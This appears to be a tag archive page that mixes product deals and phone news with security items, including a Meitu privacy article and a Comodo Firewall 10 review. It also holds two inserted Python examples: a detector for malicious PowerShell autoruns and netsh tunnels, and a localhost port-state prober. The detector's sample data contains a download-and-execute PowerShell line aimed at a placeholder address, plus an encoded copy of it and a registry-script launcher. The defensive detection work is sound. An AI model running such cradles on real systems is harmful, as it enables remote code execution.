
Tag: Intrusion Prevention System (IPS)

LG Gram review: Amazingly light laptop either needs to be cheaper...

It's a competitive market and others do better on the details.

Save 20% on Amazon’s New Generation of Fire Tablets – Deal...

The all-new Fire 7 and Fire HD 8 feature longer battery life, a thinner and lighter body, better Wi-Fi connectivity, and Alexa.
It features a beautiful 7" IPS display with higher contrast and sharper text, a 1.3 GHz quad-core processor, and up to 8 hours of battery life. 8 or 16 GB of internal storage and a microSD slot for up to 256 GB of expandable storage. Amazon has also introduced two new Fire Kids Edition (Fire 7 and Fire HD 8 Kids Editions).

To go along with the launch, customers who purchase any 3 new generation Fire Tablets save 20% by using the code FIRE3PACK at checkout.
See the full lineup here.

Report: Apple is planning a major iPhone overhaul for the fall

One 4.7-inch phone, one 5.5-inch phone, and something totally new.

Lazarus Under The Hood

Today we'd like to share some of our findings, and add something new to what's currently common knowledge about Lazarus Group activities, and their connection to the much talked about February 2016 incident, when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank.

Amazon Discounts its Fire Tablet Bundle an Additional $27.98 With This...

Through this Saturday, sink the 16GB Fire Tablet bundle's already discounted price to just $59.99 using the code FIREBUNDLE at checkout -- a significant deal considering its typical $107.97 value.

The bundle includes the latest 16GB Fire 7" Tablet with special offers ($69.99), Amazon cover ($24.99), and Nupro screen protector ($12.99).

Amazon's newest Fire tablet features a rich 7" IPS display and a 1.3 GHz quad-core processor.
Integrated Alexa service lets you ask away with a button press. Enjoy millions of movies, TV shows, songs, Kindle e-books, apps and games, and enjoy them uninterrupted with Fire's long lasting 7-hour battery.
See this deal on Amazon before it expires by adding to cart and applying FIREBUNDLE at checkout.

In-the-wild exploits ramp up against high-impact sites using Apache Struts

Hackers are still exploiting the bug to install malware on high-impact sites.

Moto G5 Plus hands-on: Solid camera, stock Android, sweet price—sign me...

Moto G5 Plus continues the trend of selling last year's tech at under half the price.

Moto G5 hands-on: A solid, metal-ish budget phone with removable battery

Moto G5 gets a fingerprint reader, metal back, and the same svelte £170 price.

Fileless attacks against enterprise networks

This threat was originally discovered by a bank’s security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC). Kaspersky Lab participated in the forensic analysis, discovering the use of PowerShell scripts within the Windows registry.

Additionally, it was discovered that the NETSH utility was used for tunnelling traffic from the victim's host to the attacker's C2.
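The two persistence and tunnelling artefacts just described (PowerShell stashed in the registry, netsh used to forward traffic to the C2) are things a responder can hunt for without a memory image. The following is an added example, not Kaspersky's or the bank's code: it runs simple detection logic over constructed samples of Run-key values and of `netsh interface portproxy show all` output. The registry entries, the encoded payload, the `HKLM:\SOFTWARE\Svc` value name and the documentation-range addresses are all made up for the sample; on a real host you would feed it the output of your autoruns collection and of netsh instead.

```python
"""Added example (not Kaspersky's, not the bank's code): detection logic for
the two artefacts described above, run over constructed samples.

1. Registry Run-key values that launch PowerShell with hidden/encoded
   command lines or that pull a script body out of another registry value.
2. netsh portproxy rules that forward a local listener to an address
   outside loopback/RFC 1918, i.e. a tunnel out of the host.
"""
import base64
import ipaddress
import re

# --- constructed samples (nothing here touches a live system) ---------------
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")

RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_AUTORUNS = [
    # (registry key, value name, value data) -- all constructed
    (RUN_KEY, "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (RUN_KEY, "Updater",
     "powershell.exe -nop -w hidden -enc " + SAMPLE_ENCODED),
    (RUN_KEY, "Helper",
     'cmd.exe /c powershell -ExecutionPolicy Bypass -c "iex (gp HKLM:\\SOFTWARE\\Svc).Script"'),
]

# Mimics `netsh interface portproxy show all`; 203.0.113.10 is a documentation address.
SAMPLE_PORTPROXY = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         4444        203.0.113.10    443
127.0.0.1       8080        10.0.0.5        8080
"""

# --- registry autorun scan ---------------------------------------------------
POWERSHELL = re.compile(r"powershell(?:\.exe)?", re.IGNORECASE)
ENCODED = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
INDICATORS = [
    r"\bIEX\b", r"Invoke-Expression", r"DownloadString", r"DownloadFile",
    r"FromBase64String", r"Net\.WebClient", r"Invoke-WebRequest",
    r"Get-ItemProperty", r"\bgp\b",                 # script body read back from the registry
    r"-ExecutionPolicy\s+Bypass", r"-nop\b", r"-w(?:indowstyle)?\s+hidden",
]
SUSPICIOUS = re.compile("|".join(f"(?:{p})" for p in INDICATORS), re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_autoruns(entries):
    """Flag PowerShell autoruns. The encoded blob is replaced by its decoded text
    before keyword matching so base64 noise cannot trigger an indicator."""
    findings = []
    for key, name, data in entries:
        if not POWERSHELL.search(data):
            continue
        decoded = decode_encoded_command(data)
        text = ENCODED.sub(" ", data) + " " + (decoded or "")
        hits = {m.group(0).lower() for m in SUSPICIOUS.finditer(text)}
        if decoded is not None:
            hits.add("-encodedcommand")
        if hits:
            findings.append({"key": key, "name": name, "decoded": decoded,
                             "indicators": sorted(hits)})
    return findings


# --- netsh portproxy scan ----------------------------------------------------
INTERNAL = [ipaddress.ip_network(n) for n in
            ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_portproxy(output):
    """Parse the netsh table into (listen_addr, listen_port, connect_addr, connect_port)."""
    rules = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) != 4 or not (parts[1].isdigit() and parts[3].isdigit()):
            continue
        try:
            listen, connect = ipaddress.ip_address(parts[0]), ipaddress.ip_address(parts[2])
        except ValueError:
            continue  # header or separator row
        rules.append((listen, int(parts[1]), connect, int(parts[3])))
    return rules


def suspicious_portproxy(rules):
    """Any forward whose target lies outside loopback/RFC 1918 is a tunnel off the host."""
    return [r for r in rules if not any(r[2] in net for net in INTERNAL)]


if __name__ == "__main__":
    for f in scan_autoruns(SAMPLE_AUTORUNS):
        print(f"[autorun] {f['key']}\\{f['name']}: {', '.join(f['indicators'])}")
        if f["decoded"]:
            print("          decoded:", f["decoded"])
    for listen, lport, connect, cport in suspicious_portproxy(parse_portproxy(SAMPLE_PORTPROXY)):
        print(f"[portproxy] {listen}:{lport} -> {connect}:{cport} (external target)")
```

Two design points: the encoded command is decoded before matching, because the interesting strings (IEX, DownloadString) only exist in the plaintext; and the portproxy check treats any forward to a non-private address as a finding, since portproxy rules are rare enough on workstations and domain controllers that each one deserves a look regardless of target.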

Megaviral Meitu “beauty” app’s data grab is anything but skin-deep

A Chinese app which allegedly makes selfies look more attractive—or more like an anime character, at any rate—has a dark secret: it demands permissions for far more personal data than it needs, including users' IMEIs, phone numbers, and GPS coordinates. Meitu, an app which has been out for years on both iOS and Android in China, has shot to fame outside the country in the last few weeks, due to the "beauty" filters it can apply to people's selfies.

Among other functions, it can sharpen people's jaws, put a sparkle in their eyes, and smooth out and lighten their skin. The result? Meitu-filtered pictures are suddenly everywhere.

The backlash, however, has been just as swift. Almost as soon as infosec bods became aware of it, they found numerous serious privacy flaws and avenues for potential leaks of personal data. One eagle-eyed researcher found the Android version of the app asked users for dozens of intrusive permissions, and sends the data to multiple servers in China—including a user's calendar, contacts, SMS messages, external storage, and IMEI number.

Take a look at the entire list of permissions from the Meitu app. pic.twitter.com/AkSw2Z50T7 — FourOctets (@FourOctets) January 19, 2017

The permissions are also out there as well pic.twitter.com/d3GuAVfM7t — FourOctets (@FourOctets) January 19, 2017

The Android version of the app is generally agreed to be the more insecure, as the OS allows it to seek significantly more permissions, but according to digital forensics expert Jonathan Zdziarski, the app secretly checks to see if a user's iPhone is jailbroken—presumably to see if it can use that information to gather additional data. On its website, the company boasts 1.1 billion installs, as well as 456 million active monthly users around the world. What it doesn't do, however, is give any indication at all about what it does with all the data it collects. Most observers believe the data is being harvested to sell to advertisers.

As Zdziarski added on Twitter, "if you like being the target of marketing and big data, by all means run Meitu.
I’m sure whoever’s buying their data will thank you." "Why would anybody want these IDs?" asked Matthew Garrett of CoreOS. "The simple answer is that app authors mostly make money by selling advertising, and advertisers like to know who's seeing their advertisements.

The more app views they can tie to a single individual, the more they can track that user's response to different kinds of adverts and the more targeted (and, they hope, more profitable) the advertising towards that user. "Using the same ID between multiple apps makes this easier, and so using a device-level ID rather than an app-level one is preferred.

The IMEI is the most stable ID on Android devices, persisting even across factory resets."

However, developer Brianna Wu disagreed, and seems to believe the data is being collected for more sinister reasons than invasive advertising. She claimed Meitu was "predatory," adding: "It's not just a consumer issue, but a national security issue." Whatever their views on the purpose of Meitu's data collection, however, everyone seems to be in agreement about one thing: think very carefully about your personal security before downloading and using the app.

Update: A Meitu spokesperson claimed to CNET that, because the company is headquartered in China, it was necessary to include the data collection code in the app to circumvent the country's blockage of tracking services from the likes of Apple and Google's app stores. It said: "To get around this, Meitu employs a combination of third-party and in-house data tracking systems to make sure the user data tracked is consistent. Furthermore, the data collected is sent securely, using multilayer encryption to servers equipped with advanced firewall, IDS and IPS protection to block external attacks."

This post originated on Ars Technica UK. Listing image by Sebastian Anthony.

Comodo Firewall 10

The firewall component in modern versions of Windows is quite effective, so the market for third-party personal firewall utilities is shrinking. Paying for a personal firewall seems especially silly when Windows has one built in.

Comodo Firewall 10 is free, and it does a lot more than the basics.
In addition to protecting your PC against attacks from the Internet and controlling how programs utilize your Internet connection, it includes a secure browser, sandbox-style virtualization, a Host Intrusion Prevention System (HIPS), and more.
It performs all expected personal firewall tasks, but not all of the bonus features worked.

Comodo's main competition is Check Point ZoneAlarm Free Firewall 2017, and there are quite a few similarities between the two.

Both companies also offer a free antivirus, for starters.

And you can also get a combined firewall and antivirus from both. With ZoneAlarm, you can convert either the antivirus or firewall to the combined product with just a click. With Comodo, you upgrade to the free edition of Comodo Internet Security.

Shared with Antivirus

The majority of Comodo Firewall's features are also found in Comodo Antivirus 10.
I'll refer you to my review of the antivirus for full details on these features. Here's a summary.

Both Comodo products offer a new, attractive user interface with two similar themes named Lycia and Arcadia.

These two feature a big status panel at left and four button panels at right; they just use slightly different colors and icons.

Those who prefer the previous edition's look can choose the Modern theme.
If you're nostalgic for really old editions of Comodo, the Classic theme gets you that look.
In addition, the main window for both products can display either a Basic View or an Advanced View; the latter puts more statistics and action items in easy reach.

While both Comodo products are free, they also both push you to pay in one way or another. Unless you carefully read all screens and popups, you'll find that without realizing it you've agreed to change all of your browsers to use Yahoo as home page, new tab, and default search engine. You'll see messages offering help from the GeekBuddy tech support system, and indeed a GeekBuddy agent will happily chat with you. However, if you want the tech to perform any kind of remote repair or remediation, you'll have to pay.

Comodo Firewall does not in itself include an antivirus component, but its File Rating component checks files against Comodo's cloud database when you access them.
If the database identifies a process as malware, or as a potentially unwanted program, Comodo terminates the process and pops up a notification. You also get a popup offering GeekBuddy services.

File Rating is also a feature of the antivirus, but in testing I found that other protection layers always kicked in before File Rating had a chance.

Both the firewall and the antivirus can automatically sandbox programs that aren't recognized by the database. However, this feature is enabled by default in the antivirus, disabled in the firewall.

A sandboxed program runs in a virtual environment, unable to permanently change important system areas. When you empty the sandbox, all virtualized changes vanish. You can actively launch any program in the sandbox, or open a fully virtualized desktop, isolated from the regular desktop.
It's similar to the SafePay desktop in Bitdefender Antivirus Plus 2017.

The main feature of the virtualized desktop is the Comodo Dragon browser.

By virtualizing your online transactions, you protect them from manipulation by other processes.

The Dragon browser includes a useful collection of bonus apps, among them a media downloader, a price-comparison tool, and a tool for quickly sharing or searching text from Web pages.

Both Comodo products include a Host Intrusion Prevention System (HIPS), but it's disabled by default in the antivirus, enabled in the firewall.

This is not a tool for foiling attempts to exploit vulnerabilities in the operating system and popular programs. Rather, when it detects suspicious behavior by a program, it asks you what to do. You can allow the behavior, block it, or choose to treat the program in question as an installer.
I tested it with a collection of utilities that share certain behaviors with malware.

Comodo only blocked the installer for one, and when I opted to treat it as an installer, I had no further problem.

The HIPS quite reasonably cast suspicion on a test utility that launches Internet Explorer and forces it to open malware-hosting URLs.

It's worth noting that ZoneAlarm's OSFirewall feature functions in much the same way. When I fully enabled the OSFirewall feature, ZoneAlarm flagged behaviors by both good and bad programs.

While Comodo Firewall isn't an antivirus itself, it includes the option to create an antivirus rescue disk, and the process of creating this disk is quite easy. You can also use it to launch Comodo's cleanup-only tool to wipe out persistent malware.

Firewall Features

As you can see, this product has a lot in common with Comodo Antivirus, but don't worry; there are plenty of firewall-specific functions too.

Each time you connect to a new network, it asks whether it's a home, work, or public network. When you're connected to a public network, Comodo puts all the system's ports in stealth mode, meaning they can't be seen from outside.
It's true that Windows Firewall also accomplishes this feat, but Comodo does it just as well. Unlike Windows Firewall, Comodo lets enthusiasts get an alert on each unsolicited connection attempt.
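"Stealth mode" has a precise meaning at the packet level: a closed port answers a SYN with a RST, which tells the scanner a host is there, while a stealthed port simply never replies and the scanner sees only its own timeout. The following added example (not Comodo's, ZoneAlarm's or PCMag's code) classifies a port from the outside on exactly that basis, and builds its own local fixture of one listening and one closed port so it runs without a firewall present. The "stealth" verdict can only be observed against a host that is actually dropping packets, so the fixture exercises the open and closed cases.

```python
"""Added example: tell an open, a closed and a stealthed port apart from
the outside, the way a firewall review's port scan does.

open    -> SYN/ACK came back: a service is listening
closed  -> RST came back: host visible, port shut (what "not stealthed" means)
stealth -> no reply at all before the timeout: silently dropped
"""
import socket


def probe(host, port, timeout=1.0):
    """Return 'open', 'closed', 'stealth' or 'unreachable' for host:port."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"            # SYN/ACK received
    except ConnectionRefusedError:
        return "closed"          # RST received: the host answered, so it is visible
    except socket.timeout:
        return "stealth"         # nothing came back: the stack or firewall dropped the SYN
    except OSError:
        return "unreachable"     # e.g. no route to host
    finally:
        s.close()


def local_fixture():
    """Constructed local fixture: one listening port and one free (closed) port.
    Returns (open_port, closed_port, listener); the caller closes the listener."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))      # port 0: let the kernel pick a free one
    listener.listen(1)
    open_port = listener.getsockname()[1]

    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()                        # released without ever connecting, so a SYN now gets RST
    return open_port, closed_port, listener


def demo():
    """Probe both fixture ports and return {port: verdict}."""
    open_port, closed_port, listener = local_fixture()
    try:
        return {open_port: probe("127.0.0.1", open_port),
                closed_port: probe("127.0.0.1", closed_port)}
    finally:
        listener.close()


if __name__ == "__main__":
    for port, verdict in demo().items():
        print(f"127.0.0.1:{port} -> {verdict}")
```

Run `probe()` against a machine on the public-network profile and every port should come back "stealth"; a "closed" verdict means the host is still advertising its presence even though nothing is listening.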

As noted earlier, Comodo's HIPS feature does not try to block attacks that exploit vulnerabilities in the OS or critical files.

The same is true of ZoneAlarm.
Symantec Norton Security Premium is the champ in this area.
In testing, it blocked more exploits than any other recent product, and it did so at the network level, before the exploit even reached the test system.

When the firewall detects an attempted network connection by a new program, it asks you what to do about it. You can choose to allow the attempt, block it, or treat the suspect program as a browser or FTP client.
If you choose to block access, you can also terminate the program, or terminate it and reverse its actions.

Testing Comodo with my hand-coded browser, I found the firewall query appeared only after three distinct warnings from the HIPS.
I also tried a few leak tests, programs that attempt to evade firewall control by manipulating or masquerading as trusted programs.

These triggered plenty of HIPS warnings, as well as firewall warnings.
I had to turn off the File Rating component for this test, because it terminated them as potentially unwanted programs.

While Comodo's HIPS and firewall popups aren't as overwhelming as they were a few versions ago, they still give the user a lot to consider. Most users really won't know whether a program should be allowed to access the DNS/RPC Client service, or access a protected COM interface.

The firewall components in Norton and Kaspersky Internet Security track suspicious behaviors, but perform their own internal analysis rather than expecting the user to make complex security decisions.

ZoneAlarm pioneered the concept that a personal firewall must defend itself against attack.
If malware can disable firewall protection programmatically, the protection isn't worth much, right? I couldn't find any Registry entry that would serve as an off switch for Comodo Firewall, and when I tried to terminate its process I got an Access Denied message.

Security products typically rely on one or more Windows services as well—Comodo has four.
I found that I could stop three of them, but not the fourth, the most essential one. However, I managed to set its startup mode to Disabled. On reboot, Comodo offered to fix the problem, after which it was fine.
Still, I'm happier with a product like ZoneAlarm or Norton that simply prevents all modification of its Windows services.

Website Filtering

Many antivirus products include a browser-protection component that helps steer users away from malicious or fraudulent URLs.

Comodo Antivirus does not. However, the firewall adds a component called Website Filtering. My contact at the company explained that Website Filtering blocks access to URLs found in Comodo's malicious URL database, but does not attempt to block phishing sites.

To evaluate this component's efficacy, I launched the malicious URL blocking test that I apply to each antivirus.

This test uses a feed of very new malware-hosting URLs supplied by MRG-Effitas.
I use URLs discovered in the last day or two, so they're very new.
I launch each one and note whether the product blocked access to the dangerous URL, wiped out the malicious payload, or completely ignored the danger.

Normally I keep at this test until I have data for 100 malware-hosting URLs. However, after processing 50 without any response from Comodo, I quit.
I suspect that Comodo's blacklist database of malicious URLs isn't updated frequently enough to detect the most recent dangers.

By contrast, Avira Antivirus blocked 93 percent of the URLs in this test.

Does the Job

Comodo Firewall 10 does everything a personal firewall should do, stealthing ports against outside attack and preventing betrayal from within by programs misusing your Internet connection.
In addition, it offers sandboxing, a secure browser, HIPS, reputation-based file rating, and more. However, some of these bonus features are too techie for the average user, and they don't all contribute to the task of a personal firewall.

Our Editors' Choice in the dwindling collection of free personal firewalls is Check Point ZoneAlarm Free Firewall 2017.
It, too, handles all the basic tasks, and it resists direct attack better than Comodo.
It does offer a collection of bonus features as well, but most are easier for the average user to comprehend.

For the tech expert, Comodo can be great, make no mistake.

But ZoneAlarm is better suited for the average user.


PCMag may earn affiliate commissions from the shopping links included on this page.

These commissions do not affect how we test, rate or review products.


Comodo Antivirus 10

Some antivirus vendors release a new version every year, with or without the coming year as part of the product name. Others, like Comodo, follow a simple version-number scheme, releasing a new version when it's ready. With Comodo Antivirus 10 the com...